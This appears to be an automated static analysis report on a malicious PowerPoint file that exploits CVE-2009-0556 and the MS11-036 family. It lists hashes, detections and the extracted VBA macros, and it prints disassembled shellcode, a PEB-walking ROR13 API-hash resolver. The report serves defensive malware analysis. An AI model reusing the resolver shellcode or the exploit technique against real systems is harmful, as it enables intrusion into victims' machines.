Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8c24a5031a90d5be…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 818.5 KB · Created: 2008-01-27 01:25:33 · Authoring application: Microsoft PowerPoint · First seen: 2012-06-28
MD5: 215787cfcf1d9e5ca21179f3a893361d · SHA-1: 1e6b1b2b750dfbd58b6aac40e0fe399e8e5bca9a · SHA-256: 8c24a5031a90d5bec758d7ae0b26e8323cda9312043d24a157bb9ca9cd18b878
Risk score: 368

Heuristics (9)

  • CVE-2009-0556 — PowerPoint malformed ClientTextbox (severity: critical; type: CVE, exact match; rule: CVE_2009_0556)
    The PowerPoint record graph contains an Escher ClientTextbox with both OutlineTextRefAtom and TextHeaderAtom children. This is the OffVis-compatible structural condition for the PowerPoint memory corruption vulnerability fixed in MS09-017.
  • PowerPoint binary-format RCE payload — CVE-2011-1269 / MS11-036 family (severity: critical; type: CVE, likely match; rule: PPT_BINARY_MEMORY_CORRUPTION_PAYLOAD)
    A macro-free binary PowerPoint (.ppt) document carries a native code payload (embedded PE and/or process-injection shellcode), staged in an oversized binary stream. Legitimate presentations do not embed executables or shellcode; this is the payload half of a PowerPoint memory-corruption exploit (CVE-2011-1269 / MS11-036 family; the same record-overflow delivery is shared with CVE-2010-2572 and CVE-2009-0556).
  • ClamAV: Ppt.Exploit.Apptom-10029459-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Ppt.Exploit.Apptom-10029459-0
  • PEB access via FS segment (x86) (severity: high; rule: SC_PEB_ACCESS)
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: code (1.0) — 10/10 branch targets land on an instruction boundary (100% coherence)
    00000A07  64a130000000      mov eax, dword ptr fs:[0x30]
    00000A0D  8b400c            mov eax, dword ptr [eax + 0xc]
    00000A10  8b701c            mov esi, dword ptr [eax + 0x1c]
    00000A13  ad                lodsd eax, dword ptr [esi]
    00000A14  8b4008            mov eax, dword ptr [eax + 8]
    00000A17  5e                pop esi
    00000A18  c3                ret
    00000A19  60                pushal
    00000A1A  8b6c2424          mov ebp, dword ptr [esp + 0x24]
    00000A1E  8b453c            mov eax, dword ptr [ebp + 0x3c]
    00000A21  8b542878          mov edx, dword ptr [eax + ebp + 0x78]
    00000A25  03d5              add edx, ebp
    00000A27  8b4a18            mov ecx, dword ptr [edx + 0x18]
    00000A2A  8b5a20            mov ebx, dword ptr [edx + 0x20]
    00000A2D  03dd              add ebx, ebp
    00000A2F  e334              jecxz 0xa65
    00000A31  49                dec ecx
    00000A32  8b348b            mov esi, dword ptr [ebx + ecx*4]
    00000A35  03f5              add esi, ebp
    00000A37  33ff              xor edi, edi
    00000A39  33c0              xor eax, eax
    00000A3B  fc                cld
    00000A3C  ac                lodsb al, byte ptr [esi]
    00000A3D  84c0              test al, al
    00000A3F  7407              je 0xa48
    00000A41  c1cf0d            ror edi, 0xd
    00000A44  03f8              add edi, eax
    00000A46  ebf4              jmp 0xa3c
    00000A48  3b7c2428          cmp edi, dword ptr [esp + 0x28]
    00000A4C  75e1              jne 0xa2f
    00000A4E  8b5a24            mov ebx, dword ptr [edx + 0x24]
    00000A51  03dd              add ebx, ebp
    00000A53  668b0c4b          mov cx, word ptr [ebx + ecx*2]
    00000A57  8b5a1c            mov ebx, dword ptr [edx + 0x1c]
    00000A5A  03dd              add ebx, ebp
    00000A5C  8b048b            mov eax, dword ptr [ebx + ecx*4]
    00000A5F  03c5              add eax, ebp
    00000A61  8944241c          mov dword ptr [esp + 0x1c], eax
    00000A65  61                popal
    00000A66  c2                .byte 0xc2
  • PEB API-hash resolver (severity: high; rule: SC_API_HASH_RESOLVER)
    PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
    Disassembly: identical to the listing under the PEB access finding above (offsets 00000A07 to 00000A66).
  • OLE file contains raw shellcode-like resolver payload (severity: high; rule: OLE_RAW_SHELLCODE_PAYLOAD)
    Malformed or legacy OLE file contains raw PEB/API-resolver shellcode bytes at the file level, including loader-walk instructions and a nearby payload marker. This indicates an exploit payload carrier but does not identify a specific parser CVE.
  • VBA macros detected (severity: medium; 2 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script
        Set xlApp = CreateObject("Excel.Application")
  • AutoOpen macro (severity: low; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas · Kind: vba-macro · Source: oletools.olevba.extract_macros (decoded VBA source) · Size: 1005 bytes
SHA-256: 7403e4728955600b20e1b11715dae9328df16f95bc7db40bf64d8dfe55835d1d
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
Sub AutoOpen()
'Parameters: [PPT file] [macro name]
c = Command()
cl = InStr(c, " ")
c1 = Left(c, cl - 1)
c2 = Right(c, Len(c) - cl)
Dim a As New PowerPoint.Application
a.WindowState = ppWindowMaximized
a.Visible = True
a.Presentations.Open c1
a.Run (c1 & "!" & c2)
Set a = Nothing


End Sub

Dim xlApp As excel.Application
Dim xlBook As excel.workbook

Sub test()

    'launch the Excel file
    Set xlApp = CreateObject("Excel.Application")
    Set xlBook = xlApp.workbooks.Open("chemin_du_fichier.xls")
    xlApp.Visible = True
    
End Sub

Sub valid()

    'run the Excel "valider" macro
    xlApp.Run "feuil2.valider"

End Sub

Attribute VB_Name = "Classe1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False